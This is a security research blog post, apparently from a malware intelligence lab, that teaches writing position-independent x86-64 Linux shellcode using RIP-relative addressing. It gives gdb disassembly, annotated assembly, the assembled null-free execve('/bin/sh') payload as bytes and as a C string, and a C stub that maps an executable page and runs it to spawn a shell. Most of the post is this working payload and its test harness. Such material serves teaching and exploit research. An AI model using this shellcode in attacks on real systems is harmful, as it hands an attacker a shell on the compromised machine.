Instruction Pointer Relative Addressing (for position independent code)

So, here's an interesting trick I've been using that I've never seen anyone mention before. One of the new features AMD added to the x86 instruction set when they designed AMD64/x86-64 is that in 64-bit mode (the 64-bit part of "long mode"), the encoding that used to mean a bare 32-bit absolute displacement now means a signed 32-bit displacement from the current RIP, not from 0x00000000 like before. In English, this means you don't have to know the absolute address of something you want to reference; you only need to know how far away it is from the currently executing instruction (technically, from the next instruction).
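To make that arithmetic concrete, here is a minimal sketch in C of how the effective address of a RIP-relative operand is formed. The helper name `rip_relative_target` and the example addresses are made up for illustration. The only fact it leans on is that the displacement is a signed 32-bit value added to the address of the next instruction.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper (not from any library): effective address of a
 * RIP-relative operand. RIP already points at the NEXT instruction when
 * the displacement is applied, hence insn_addr + insn_len. */
static uint64_t rip_relative_target(uint64_t insn_addr, size_t insn_len,
                                    int32_t disp32)
{
    /* Sign-extend the 32-bit displacement to 64 bits before adding. */
    return insn_addr + (uint64_t)insn_len + (uint64_t)(int64_t)disp32;
}

/* Example: a 7-byte instruction at 0x1000 with displacement -7 refers
 * back to its own first byte. */
static void rip_relative_example(void)
{
    assert(rip_relative_target(0x1000, 7, -7) == 0x1000);
}
```

A displacement of 0 would point at the byte right after the instruction, which is why "how far away is it from the next instruction" is all the code needs to know.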

So, let's say you're writing a fairly generic execve() shellcode. I'm going to assume that everyone here has read Aleph One's paper on this, so I'm not going to repeat that here. (Gripe: What is it with all these shellcode tutorials, that are just slightly rewritten copies of "Smashing the Stack…"?)

This is what we want to do:


execve() example in C

#include <stdio.h>

#include <unistd.h>

int main() {

char *name[2];

asm("nop");

name[0] = "/bin/sh";

name[1] = NULL;

execve(name[0], name, NULL);

asm("nop");

return 0;

}


I just put the NOPs in there to make things easier to spot below.

gdb spewage

gcc -static -g -o example example.c

gdb example

[spew]

*(gdb) disassemble main

Dump of assembler code for function main:

0x0000000000400284 <main+0>: push %rbp

0x0000000000400285 <main+1>: mov %rsp,%rbp

0x0000000000400288 <main+4>: sub $0x10,%rsp

0x000000000040028c <main+8>: nop

0x000000000040028d <main+9>: movq $0x451ce4,0xfffffffffffffff0(%rbp)

0x0000000000400295 <main+17>: movq $0x0,0xfffffffffffffff8(%rbp)

0x000000000040029d <main+25>: lea 0xfffffffffffffff0(%rbp),%rsi

0x00000000004002a1 <main+29>: mov 0xfffffffffffffff0(%rbp),%rdi

0x00000000004002a5 <main+33>: mov $0x0,%edx

0x00000000004002aa <main+38>: mov $0x0,%eax

0x00000000004002af <main+43>: callq 0x406740 <execve>

0x00000000004002b4 <main+48>: nop

0x00000000004002b5 <main+49>: mov $0x0,%eax

0x00000000004002ba <main+54>: leaveq

0x00000000004002bb <main+55>: retq

End of assembler dump.

*(gdb) disassemble execve

Dump of assembler code for function execve:

0x0000000000406740 <execve+0>: mov $0x0,%eax

0x0000000000406745 <execve+5>: mov %rbx,0xffffffffffffffe8(%rsp)

0x000000000040674a <execve+10>: mov %rbp,0xfffffffffffffff0(%rsp)

0x000000000040674f <execve+15>: mov %r12,0xfffffffffffffff8(%rsp)

0x0000000000406754 <execve+20>: sub $0x18,%rsp

0x0000000000406758 <execve+24>: test %rax,%rax

0x000000000040675b <execve+27>: mov %rdi,%r12

0x000000000040675e <execve+30>: mov %rsi,%rbp

0x0000000000406761 <execve+33>: mov %rdx,%rbx

0x0000000000406764 <execve+36>: je 0x40676b <execve+43>

0x0000000000406766 <execve+38>: callq 0x0

0x000000000040676b <execve+43>: mov %rbx,%rdx

0x000000000040676e <execve+46>: mov %rbp,%rsi

0x0000000000406771 <execve+49>: mov %r12,%rdi

0x0000000000406774 <execve+52>: mov $0x3b,%eax

0x0000000000406779 <execve+57>: syscall

You can ignore the rest of this...

0x000000000040677b <execve+59>: cmp $0xfffffffffffff000,%rax

0x0000000000406781 <execve+65>: mov %rax,%rbx

0x0000000000406784 <execve+68>: ja 0x40679b <execve+91>

0x0000000000406786 <execve+70>: mov %ebx,%eax

0x0000000000406788 <execve+72>: mov 0x8(%rsp),%rbp

0x000000000040678d <execve+77>: mov (%rsp),%rbx

0x0000000000406791 <execve+81>: mov 0x10(%rsp),%r12

0x0000000000406796 <execve+86>: add $0x18,%rsp

0x000000000040679a <execve+90>: retq

0x000000000040679b <execve+91>: callq 0x400950 <__errno_location>

0x00000000004067a0 <execve+96>: mov %ebx,%edx

0x00000000004067a2 <execve+98>: mov $0xffffffffffffffff,%rbx

0x00000000004067a9 <execve+105>: neg %edx

0x00000000004067ab <execve+107>: mov %edx,(%rax)

0x00000000004067ad <execve+109>: jmp 0x406786 <execve+70>

0x00000000004067af <execve+111>: nop

End of assembler dump.

*(gdb) x/s 0x451ce4

0x451ce4 <_IO_stdin_used+4>: "/bin/sh"

For lack of being able to easily draw arrows in flat HTML, I'm just coloring the important parts. As you can see, argument 1, the pointer to "/bin/sh", is in RDI; argument 2, the pointer to the array holding that pointer followed by NULL, is in RSI; and argument 3, in RDX, is NULL. 0x3B (59 decimal) is the syscall number for execve.

We could have also just looked in /usr/linux/include/asm/unistd.h for the calling convention.

Excerpt from unistd.h

#define __NR_execve                             59

__SYSCALL(__NR_execve, stub_execve)

[...]

#define _syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \

type name(type1 arg1,type2 arg2,type3 arg3) \

{ \

long __res; \

__asm__ volatile (__syscall \

: "=a" (__res) \

: "0" (__NR_##name),"D" ((long)(arg1)),"S" ((long)(arg2)), \

"d" ((long)(arg3)) : __syscall_clobber); \

__syscall_return(type,__res); \

}
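As a sanity check on that calling convention, here is a rough sketch in C that issues a raw syscall the same way: number in RAX, arguments in RDI, RSI and RDX. The name `raw_syscall3` is mine, not the kernel's, and the inline assembly assumes GCC or Clang on x86-64 Linux (anything else falls back to libc's `syscall()`). It is exercised with the harmless `getpid` rather than `execve`.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical wrapper: syscall number in RAX, arguments in RDI, RSI, RDX.
 * The SYSCALL instruction itself clobbers RCX and R11. */
static long raw_syscall3(long nr, long a1, long a2, long a3)
{
#if defined(__x86_64__) && defined(__linux__)
    long ret;
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "0"(nr), "D"(a1), "S"(a2), "d"(a3)
                      : "rcx", "r11", "memory");
    return ret;
#else
    /* Assumption: on other platforms just defer to libc. */
    return syscall(nr, a1, a2, a3);
#endif
}

/* Example: the raw call and the libc wrapper agree on our PID. */
static void raw_syscall_example(void)
{
    assert(raw_syscall3(SYS_getpid, 0, 0, 0) == (long)getpid());
}
```

The constraint letters ("a", "D", "S", "d") are the same ones the `_syscall3` macro above uses, which is a nice cross-check that the registers were read off the disassembly correctly.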

So, all we have to do is have a "/bin/sh" string somewhere in memory, and a pointer to it somewhere else, followed by a NULL. Wherever our shellcode got written to is as good a place as any, but how do we know where we're executing from? On IA-32, there are only two really easy ways to get your current EIP: by making a CALL foo, which is like doing a PUSH EIP ; JMP foo, or by executing a floating point instruction and dumping the x87 environment out into memory with FSTENV. (Historically, the FPU was a completely separate chip and did its own exception handling and stuff, so it keeps track of the address of the last FPU instruction it ran.)

In Aleph One's original paper he did this trick:

JMP foo

bar: POP ESI

<rest of shellcode>

foo: CALL bar

.string "/bin/sh"

Which gives you, in ESI, the address of that "/bin/sh" at the end of your shellcode. Most of the Pex decoders in the Metasploit Framework use FSTENV to write the FPU environment out onto the stack, starting 12 bytes below the current ESP in fact, which leaves the fourth DWORD (the FPU instruction pointer, at offset 12) at the top of the stack, where it can then just be POP'ed off.
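For anyone wondering why 12 bytes is the magic number, here is a small sketch of the 28-byte environment that FSTENV stores in 32-bit protected mode, written as a C struct. The struct and field names are illustrative, not taken from any header. The instruction pointer field sits 12 bytes in, so storing the block at ESP-12 drops that field exactly at [ESP].

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Illustrative layout of the x87 environment written by FSTENV/FNSTENV
 * in 32-bit protected mode (28 bytes). */
struct x87_env32 {
    uint16_t control_word; uint16_t reserved0;  /* offset  0 */
    uint16_t status_word;  uint16_t reserved1;  /* offset  4 */
    uint16_t tag_word;     uint16_t reserved2;  /* offset  8 */
    uint32_t fpu_ip;       /* offset 12: address of the last FPU instruction */
    uint16_t fpu_cs;       uint16_t opcode;     /* offset 16 */
    uint32_t fpu_dp;       /* offset 20: last data operand pointer */
    uint16_t fpu_ds;       uint16_t reserved3;  /* offset 24 */
};

/* Where fpu_ip lands relative to ESP if the block is stored at
 * ESP + store_offset. */
static int fpu_ip_offset_from_esp(int store_offset)
{
    return store_offset + (int)offsetof(struct x87_env32, fpu_ip);
}

/* Example: storing at ESP-12 puts fpu_ip at [ESP], ready to POP. */
static void fstenv_example(void)
{
    assert(fpu_ip_offset_from_esp(-12) == 0);
}
```

Note that what gets popped is the address of the last FPU instruction executed, so the decoder has to run one right before the FSTENV.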

On x86-64, it is much easier to find your current RIP. Just do this:

LEA RAX, [RIP]

And RAX will contain the address of the next instruction.
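If you want to poke at the LEA-from-RIP trick from C, something like the following sketch should do. It assumes GCC or Clang extended asm (AT&T syntax) and only does anything useful when built for x86-64. The names `current_rip` and `RIP_LEA_AVAILABLE` are made up for this example.

```c
#include <assert.h>
#include <stdint.h>

#if defined(__x86_64__) && (defined(__GNUC__) || defined(__clang__))
#define RIP_LEA_AVAILABLE 1
#else
#define RIP_LEA_AVAILABLE 0
#endif

/* Returns the address of the instruction that follows the LEA,
 * or 0 when not built for x86-64 (assumption: GCC/Clang inline asm). */
__attribute__((noinline))
static uintptr_t current_rip(void)
{
#if RIP_LEA_AVAILABLE
    uintptr_t rip;
    /* A 64-bit destination register keeps the whole address. */
    __asm__ volatile ("lea 0(%%rip), %0" : "=r"(rip));
    return rip;
#else
    return 0;
#endif
}

/* Example: on x86-64 the result is a real, non-zero code address. */
static void current_rip_example(void)
{
    uintptr_t rip = current_rip();
    assert(!RIP_LEA_AVAILABLE || rip != 0);
}
```

The returned address lands a few bytes past the start of `current_rip` itself, which is an easy thing to eyeball in gdb.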

blah blah blah…

So, I was going to write a long narrative here about how to write shellcode, remove nulls, use shorter instruction encodings, and stuff. But I got distracted and lost my train of thought, so if there's anything here you don't understand, just ask. By using [RIP-7] rather than just [RIP], you avoid encoding a 0x00000000 displacement (the LEA is 7 bytes long, so RIP-7 is the address of the LEA itself). Everything else should be self-explanatory. I'm writing the argv array just past the end of the "/bin/sh" string.
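Here is a quick sketch in C of why the [RIP-7] form matters. It hand-encodes LEA RDI, [RIP+disp32] and checks the result for 0x00 bytes. The function names are hypothetical; the encoding itself (REX.W prefix 48, opcode 8D, ModRM 3D, then a little-endian disp32) is the standard one for this instruction.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Encode LEA RDI, [RIP+disp32]: REX.W (48), opcode 8D, ModRM 3D
 * (mod=00, reg=RDI, rm=101 selects RIP-relative), disp32 little-endian. */
static void encode_lea_rdi_rip(int32_t disp32, uint8_t out[7])
{
    uint32_t d = (uint32_t)disp32;
    out[0] = 0x48;
    out[1] = 0x8D;
    out[2] = 0x3D;
    out[3] = (uint8_t)(d);
    out[4] = (uint8_t)(d >> 8);
    out[5] = (uint8_t)(d >> 16);
    out[6] = (uint8_t)(d >> 24);
}

/* Returns 1 if any byte in buf is 0x00, else 0. */
static int has_null_byte(const uint8_t *buf, size_t len)
{
    return memchr(buf, 0, len) != NULL;
}

/* Example: displacement 0 encodes four zero bytes, -7 encodes none. */
static void lea_encoding_example(void)
{
    uint8_t insn[7];
    encode_lea_rdi_rip(0, insn);
    assert(has_null_byte(insn, sizeof insn));
    encode_lea_rdi_rip(-7, insn);
    assert(!has_null_byte(insn, sizeof insn));
}
```

Any small negative displacement would avoid the nulls just as well; -7 is simply the one that makes the result the address of the LEA itself.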


Shellcode

%define arg1      RDI

%define arg2 RSI

%define arg3 RDX

%define arg3_lowb DL

%define sys_nr AL

%define nr_execve 0x3B

BITS 64

LEA arg1, [RIP-here] ; runtime address of *this* LEA instruction,

; removes 00000000's (always encode with 32-bit

; immediate)

; todo: could just push string onto stack (as

; immediate value)

here:

ADD arg1, BYTE bin_sh ; offset of "/bin/sh" in code below

XOR arg3, arg3 ; execve(..., ..., NULL);

MOV [arg1+null_byte ], arg3_lowb ; write a '\0' to end of string, just in case

MOV [arg1+null_point], arg3 ; name[1] = NULL;

MOV [arg1+name_array], arg1 ; name[0] = address to "/bin/sh" in

; execve("/bin/sh", ..., ...);

LEA arg2, [arg1+name_array] ; execve(..., name, ...);

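MOV sys_nr, nr_execve ; Syscall 59 execve(); only AL is written, so this

; assumes the rest of RAX is already zero

SYSCALL ; 64-bit syscall ABI (INT 0x80 would use the 32-bit

; syscall numbers and registers instead)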

bin_sh:

db "/bin/sh";

null_byte equ $-bin_sh

name_array equ null_byte +1

null_point equ name_array+8


The shellcode binary ends up looking like this:

Shellcode Bytes

488D3DF9FFFFFF          LEA RDI, [RIP-here]

4883C721 ADD RDI, BYTE bin_sh

4831D2 XOR RDX, RDX

885707 MOV [RDI+null_byte ], DL

48895710 MOV [RDI+null_point], RDX

48897F08 MOV [RDI+name_array], RDI

488D7708 LEA RSI, [RDI+name_array]

B03B MOV AL, 0x3B

0F05 SYSCALL

2F62696E2F7368 db "/bin/sh"
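As a cross-check on the listing, here is a small C sketch that looks at the assembled bytes as plain data: no nulls, 40 bytes long, and the immediate in the ADD matching where "/bin/sh" actually sits. The helper names are made up; the bytes are copied from the listing above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* The 40 bytes from the listing above. */
static const uint8_t shellcode_bytes[] = {
    0x48, 0x8d, 0x3d, 0xf9, 0xff, 0xff, 0xff,  /* LEA RDI, [RIP-7]  */
    0x48, 0x83, 0xc7, 0x21,                    /* ADD RDI, 0x21     */
    0x48, 0x31, 0xd2,                          /* XOR RDX, RDX      */
    0x88, 0x57, 0x07,                          /* MOV [RDI+7], DL   */
    0x48, 0x89, 0x57, 0x10,                    /* MOV [RDI+16], RDX */
    0x48, 0x89, 0x7f, 0x08,                    /* MOV [RDI+8], RDI  */
    0x48, 0x8d, 0x77, 0x08,                    /* LEA RSI, [RDI+8]  */
    0xb0, 0x3b,                                /* MOV AL, 0x3B      */
    0x0f, 0x05,                                /* SYSCALL           */
    '/', 'b', 'i', 'n', '/', 's', 'h'
};

/* Offset of the first occurrence of needle in hay, or -1 if absent. */
static long find_bytes(const uint8_t *hay, size_t hay_len, const char *needle)
{
    size_t n = strlen(needle);
    for (size_t i = 0; i + n <= hay_len; i++)
        if (memcmp(hay + i, needle, n) == 0)
            return (long)i;
    return -1;
}

/* End (exclusive) of the region the shellcode writes to, counted from its
 * first byte: name[1] is an 8-byte store at string_offset + 16. */
static size_t bytes_touched(size_t string_offset)
{
    return string_offset + 16 + 8;
}

/* Example: the ADD immediate (byte 10) equals the string's offset. */
static void shellcode_layout_example(void)
{
    long off = find_bytes(shellcode_bytes, sizeof shellcode_bytes, "/bin/sh");
    assert(off == (long)shellcode_bytes[10]);
}
```

One thing this makes visible: the code stores up to 57 bytes from its own start, 17 bytes past the end of the 40 it occupies, so wherever it lands needs that much writable room after it.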

To quickly test this out, I'm just mmap'ing a page of anonymous memory, writing the shellcode into it, and then running it. I have to do it this way because Gentoo Linux x86_64 sets memory pages to be either writable XOR executable, but not both at once, and non-exec actually works on AMD64. This is a lot faster than writing a real exploit (which would involve building my own stack frames to make return-to-libc calls, to call mprotect and stuff, blah blah).

memory map

$ cat /proc/16874/maps


00400000-00471000 r-xp 00000000 fd:05 4853              /home/jwolf/duh

00571000-00573000 rw-p 00071000 fd:05 4853              /home/jwolf/duh

00573000-00596000 rw-p 00573000 00:00 0                 [heap]

2b429e3da000-2b429e3db000 rwxs 00000000 00:07 326570    /dev/zero (deleted)    <- this is the mmap'd page

7fffff7f6000-7fffff80c000 rw-p 7fffff7f6000 00:00 0     [stack]

ffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0 [vdso]

Cut and paste the output of this into shellcode[] below:

yasm -l shellcode.log -L nasm shellcode.yasm && hexdump -v -e '1/1 "Qx%02x"' shellcode \

|tr "Q" \\\\ ; echo ; ls -l shellcode


Small code stub in C

#include <string.h>

#include <sys/mman.h>

// TODO: just mmap the binary file the assembler spit out.

char shellcode[] = "\x48\x8d\x3d\xf9\xff\xff\xff\x48\x83\xc7\x21\x48\x31\xd2\x88\x57\x07\x48\x89\x57\x10\x48\x89\x7f\x08\x48\x8d\x77\x08\xb0\x3b\x0f\x05\x2f\x62\x69\x6e\x2f\x73\x68";

int length = 40;

int main() {

void (*exec_mem)() = mmap (0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,

MAP_SHARED|MAP_ANONYMOUS, -1, 0); /* fd is -1 for an anonymous mapping */

memcpy(exec_mem, shellcode, length);

asm("break: nop");

exec_mem();

}


Build with something like:

gcc -g -o stub stub.c

then ./stub

sh-3.00$

or if you were root at the time:

sh-3.00#

ta-da.

Debugging notes

If you need to debug this because you got a segfault, then that's a long long topic that I don't feel like writing about right now. I usually start off with:

gdb stub |tee -a gdb_spew.log

and then…

break break

display/i $rip

r

stepi

and then do "info reg" and "x/8xg" stuff as needed.

Postscript:

Has anyone else noticed that when running in 32-bit compatibility mode on AMD64 Linux:

  1. gdb is just plain broken (wrong values in registers, etc.)
  2. The register used for the second syscall argument changes between ECX and EBP depending on whether you're using INT 0x80 or SYSCALL. (CD80 vs. 0F05)



Julia Wolf @ FireEye Malware Intelligence Lab

Questions/Comments to research [@] fireeye [.] com